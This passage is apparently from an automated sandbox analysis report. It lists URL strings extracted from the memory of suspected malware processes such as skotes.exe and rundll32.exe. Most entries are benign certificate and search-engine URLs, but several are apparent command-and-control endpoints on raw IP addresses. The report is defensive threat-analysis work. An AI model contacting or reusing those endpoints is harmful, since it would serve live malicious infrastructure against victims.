Source: rundll32.exe, 0000001A.00000002.5403969374.00000000032F0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.5403588719.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000021.00000002.5403786166.00000000032C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000027.00000002.5403295633.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.209/
Source: rundll32.exe, 00000027.00000002.5403295633.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.209/Fru7Nk9/index.php
Source: rundll32.exe, 0000001A.00000002.5403969374.000000000329A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.209/Fru7Nk9/index.php(#
Source: rundll32.exe, 00000021.00000002.5403786166.00000000032B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.209/Fru7Nk9/index.php.
Source: rundll32.exe, 00000027.00000002.5403295633.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.209/Fru7Nk9/index.php3G%S
Source: rundll32.exe, 0000001E.00000002.5403588719.0000000000ECA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.209/Fru7Nk9/index.phpF
Source: rundll32.exe, 00000019.00000002.5401399081.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.209/Fru7Nk9/index.phpST
Source: rundll32.exe, 00000019.00000002.5401399081.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.209/Fru7Nk9/index.phpeN
Source: rundll32.exe, 00000021.00000002.5403786166.00000000032B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.209/Fru7Nk9/index.phpj
Source: rundll32.exe, 00000021.00000002.5403786166.00000000032B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.209/Fru7Nk9/index.phpv
Source: rundll32.exe, 00000019.00000002.5401399081.0000000000C64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.209/Fru7Nk9/index.phpz
Source: skotes.exe, 00000018.00000002.5411293515.000000000126C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000018.00000002.5411293515.000000000126C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Pictures
Source: skotes.exe, 00000018.00000002.5411293515.000000000126C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/ViewSizePreferences.SourceAumid$w
Source: skotes.exe, 00000018.00000002.5411293515.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index
Source: skotes.exe, 00000018.00000002.5411293515.00000000012B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000018.00000002.5411293515.00000000012B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php(
Source: skotes.exe, 00000018.00000002.5411293515.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php)a
Source: skotes.exe, 00000018.00000002.5411293515.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php-
Source: skotes.exe, 00000018.00000002.5411293515.0000000001292000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php-.
Source: skotes.exe, 00000018.00000002.5411293515.0000000001259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php0001
Source: skotes.exe, 00000018.00000002.5411293515.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php3.43
Source: skotes.exe, 00000018.00000002.5411293515.000000000123F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php6
Source: skotes.exe, 00000018.00000002.5411293515.0000000001292000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php:#
Source: skotes.exe, 00000018.00000002.5411293515.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php=ae
Source: skotes.exe, 00000018.00000002.5411293515.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpIa9
Source: skotes.exe, 00000018.00000002.5411293515.000000000126C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpP
Source: skotes.exe, 00000018.00000002.5411293515.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpU
Source: skotes.exe, 00000018.00000002.5411293515.00000000012B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpX
Source: skotes.exe, 00000018.00000002.5411293515.0000000001292000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpYM
Source: skotes.exe, 00000018.00000002.5411293515.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpaa
Source: skotes.exe, 00000018.00000002.5411293515.0000000001292000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
Source: skotes.exe, 00000018.00000002.5411293515.00000000012B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phph
Source: skotes.exe, 00000018.00000002.5411293515.0000000001292000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpm
Source: skotes.exe, 00000018.00000002.5411293515.0000000001292000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000018.00000002.5411293515.0000000001292000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedPM
Source: skotes.exe, 00000018.00000002.5411293515.0000000001292000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodeduM
Source: skotes.exe, 00000018.00000002.5411293515.0000000001259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
Source: skotes.exe, 00000018.00000002.5411293515.00000000012B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpp
Source: skotes.exe, 00000018.00000002.5411293515.00000000012B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phptent-T
Source: skotes.exe, 00000018.00000002.5411293515.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpua-
Source: skotes.exe, 00000018.00000002.5411293515.000000000126C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/c00b58987e8e4f4b2846d934f48b15eaa10a45
Source: skotes.exe, 00000018.00000002.5411293515.000000000126C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/fac00b58987e8e4f4b2846d934f48b15eaa495c49#019w
Source: skotes.exe, 00000018.00000002.5411293515.000000000126C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/l
Source: skotes.exe, 00000018.00000002.5411293515.000000000126C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/ta
Source: rundll32.exe, 00000027.00000002.5403295633.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.2w5
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 6ca8f7e5e2.exe, 0000001C.00000003.2933995522.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3142338570.000000000596C000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3536364166.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 6ca8f7e5e2.exe, 0000001C.00000003.2933995522.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3142338570.000000000596C000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3536364166.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 6ca8f7e5e2.exe, 0000001C.00000003.2933995522.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3142338570.000000000596C000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3536364166.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 6ca8f7e5e2.exe, 0000001C.00000003.2933995522.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3142338570.000000000596C000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3536364166.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 6ca8f7e5e2.exe, 0000001C.00000003.2933995522.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3142338570.000000000596C000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3536364166.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 6ca8f7e5e2.exe, 0000001C.00000003.2933995522.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3142338570.000000000596C000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3536364166.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: 6ca8f7e5e2.exe, 0000001C.00000003.2933995522.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3142338570.000000000596C000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3536364166.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3362544197.0000000005BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: 6ca8f7e5e2.exe, 0000001C.00000003.2933995522.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3142338570.000000000596C000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3536364166.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: 6ca8f7e5e2.exe, 0000001C.00000003.2933995522.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3142338570.000000000596C000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3536364166.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: chromecache_573.4.dr	String found in binary or memory: http://schema.org/Organization
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2444941161.000000006F8DD000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2432516145.000000001D109000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2443645460.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 6ca8f7e5e2.exe, 0000001C.00000003.2933995522.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3142338570.000000000596C000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3536364166.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 6ca8f7e5e2.exe, 0000001C.00000003.2933995522.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3142338570.000000000596C000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3536364166.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2187780870.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2904636044.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092194855.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092620419.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3091963136.000000000590B000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365343148.0000000005B68000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365202016.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_573.4.dr, chromecache_609.4.dr	String found in binary or memory: https://aka.ms/feedback/report?space=61
Source: chromecache_573.4.dr	String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: chromecache_573.4.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
Source: chromecache_573.4.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
Source: file.exe, 00000000.00000002.2409398510.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348404528.0000000000DED000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3168645780.0000000001160000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3583354047.0000000005B80000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3583089738.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2409398510.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348404528.0000000000DED000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3168645780.0000000001160000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3583354047.0000000005B80000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3583089738.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: file.exe, 00000000.00000003.2187780870.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2904636044.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092194855.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092620419.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3091963136.000000000590B000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365343148.0000000005B68000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365202016.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2187780870.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2904636044.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919607246.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919514089.0000000005BB3000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092194855.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3116779772.0000000005922000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092620419.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3091963136.000000000590B000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3456431500.0000000005BBD000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365343148.0000000005B68000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365202016.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2187780870.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2904636044.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919607246.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919514089.0000000005BB3000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092194855.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3116779772.0000000005922000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092620419.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3091963136.000000000590B000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3456431500.0000000005BBD000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365343148.0000000005B68000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365202016.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: manifest.json.9.dr	String found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json.9.dr	String found in binary or memory: https://chromewebstore.google.com/
Source: 5f4fff8b-46ad-4bb6-932e-7234e601710b.tmp.10.dr	String found in binary or memory: https://clients2.google.com
Source: manifest.json0.9.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 5f4fff8b-46ad-4bb6-932e-7234e601710b.tmp.10.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: file.exe, 00000000.00000002.2409398510.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348404528.0000000000DED000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3168645780.0000000001160000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3583354047.0000000005B80000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3583089738.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2409398510.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348404528.0000000000DED000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3168645780.0000000001160000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3583354047.0000000005B80000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3583089738.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: manifest.json0.9.dr	String found in binary or memory: https://docs.google.com/
Source: manifest.json0.9.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json0.9.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json0.9.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json0.9.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json0.9.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json0.9.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json0.9.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json0.9.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json0.9.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json0.9.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json0.9.dr	String found in binary or memory: https://drive.google.com/
Source: file.exe, 00000000.00000003.2187780870.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2904636044.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919607246.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919514089.0000000005BB3000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092194855.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3116779772.0000000005922000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092620419.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3091963136.000000000590B000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3456431500.0000000005BBD000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365343148.0000000005B68000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365202016.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2187780870.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2904636044.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919607246.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919514089.0000000005BB3000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092194855.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3116779772.0000000005922000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092620419.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3091963136.000000000590B000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3456431500.0000000005BBD000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365343148.0000000005B68000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365202016.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2187780870.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2904636044.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919607246.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919514089.0000000005BB3000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092194855.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3116779772.0000000005922000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092620419.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3091963136.000000000590B000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3456431500.0000000005BBD000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365343148.0000000005B68000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 